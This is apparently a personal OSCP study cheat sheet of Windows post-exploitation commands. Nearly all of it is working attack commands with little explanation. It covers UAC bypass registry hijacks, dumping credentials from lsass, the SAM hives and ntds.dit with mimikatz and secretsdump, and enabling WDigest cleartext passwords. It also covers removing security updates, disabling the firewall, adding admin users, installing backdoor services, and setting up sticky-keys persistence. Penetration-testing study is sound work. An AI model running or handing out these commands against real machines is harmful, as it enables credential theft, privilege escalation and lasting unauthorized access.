|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     

Last changed: 17.06.2019

Windows post exploitation

This is another part of my notes I collected for the Offensive Security Certified Professional exam.

login information


net user %username%

system information

version and service pack info


environment variables



net config workstation

running tasks

tasklist /V
taskkill /pid 1234

installed software

wmic product get name,vendor,version

uninstall security update

wusa /uninstall /kb:1234567 /quiet /norestart

group policies

gpresult /user victim /z > user_gpo.txt
gpresult /user victim /scope computer /z > computer_gpo.txt
nbtstat -n
nltest /dclist:target.domain
dir \\DC\SYSVOL\
robocopy /e \\DC\SYSVOL\target.domain\Policies .

user management

usernames and privileges

net user
net user Administrator /active:yes
net user Administrator new_password

create new admin user

net user admin password /add
net localgroup administrators admin /add

uac bypass

reg add "hkcu\software\classes\mscfile\shell\open\command" /t REG_SZ /d "c:\windows\system32\cmd.exe /c whoami /priv > c:\bypass.txt" /f
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f 

hash extraction

lsass process

wce.exe -d

lsass process (meterpreter)

run post/windows/gather/hashdump

lsass process (mimikatz)

sekurlsa::pth /user:Administrator /domain:. /ntlm:<admin-hash>

lsass core dump (mimikatz)

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit


To dump hashes of local accounts from the registry creddump7 can be used.

reg save hklm\sam c:\SAM
reg save hklm\system c:\SYSTEM
reg save hklm\security c:\SECURITY
cachedump SYSTEM SECURITY True

domain controller

To extract password hashes from an active directory you will need the file ntds.dit and the SYSTEM registry hive from the domain controller. Then you can use the tools Libesedb and ntdsxtract.

esedbexport -m tables ntds.dit
dsuser.py datatable link_table output --syshive SYSTEM --passwordhashes --pwdformat ophc --ntoutfile hashes.nt -lmoutfile hashes.lm

Impacket can extract the hashes in one step

secretsdump.py -ntds ntds.dit -system SYSTEM -just-dc-ntlm LOCAL > hashes.txt

enable wdigest cleartext password storage

reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f

network configuration

network interfaces

ipconfig /all
netsh int ip set address "local area connection" static

modify routes

route print
route add mask

enable IP forwarding

reg add hklm\system\currentcontrolset\services\remoteaccess \v Start \t REG_DWORD \d 2 \f
sc start remoteaccess

open ports

netstat -anb

disable firewall

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

enable remote desktop

reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall show rule name=all | find /i "remote" | find /i "desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

login (from linux)

xfreerdp /u:user /p:password /v:<target>

file system

list disks

wmic logicaldisk get filesystem,freespace,name,size,volumename


type file.txt | find /n /i "string"
dir /s /r | find ":$DATA"
forfiles /p c:\users /s /m *.exe /c "cmd /c echo @fdate @ftime @fsize @file"

volume shadow copy

Windows Server allows invoking shadow copies via vssadmin. This can help to copy files which are locked for reading.

vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY SECURITY.bak

scheduled tasks

list tasks


create task

schtasks /create /sc minute /tn test /tr cmd.exe
schtasks /run /tn test
schtasks /delete /tn test /f


list services

sc query

create service

sc create new_service binpath= "cmd /K start c:\backdoor.exe" start=auto error=ignore
sc qc new_service

modify service

sc config new_service binpath= "cmd /K start c:\new_backdoor.exe"
sc start new_service

windows network

netbios discovery (from linux)

nbtscan -v
nmap --script smb-enum-users.nse
nmap --script smb-check-vulns.nse
rpcclient -U ""

netbios discovery (from windows)

nbtstat -A <target>


rpcclient -U user
$> srvinfo
$> enumdomains
$> enumdomusers

server message block

smb file share

net share
net share test=c:\test
net use x: \\<target>\test
net use x: /delete
net share test /delete

mount share in linux

mount -t cifs //<target>/test /mnt/cifs -o username=user

remote command execution

psexec -accepteula -u Administrator -p password //<target> <command>
winexe -U Administrator%password //<target> <command>
rpcclient -U Administrator <target>

parsing outlook mailbox

The libpst package contains tools for converting outlook .pst files

readpst -o extracted_mails mailbox.pst

persistent login bypass

sticky key

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

ease of access

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

hiding file extension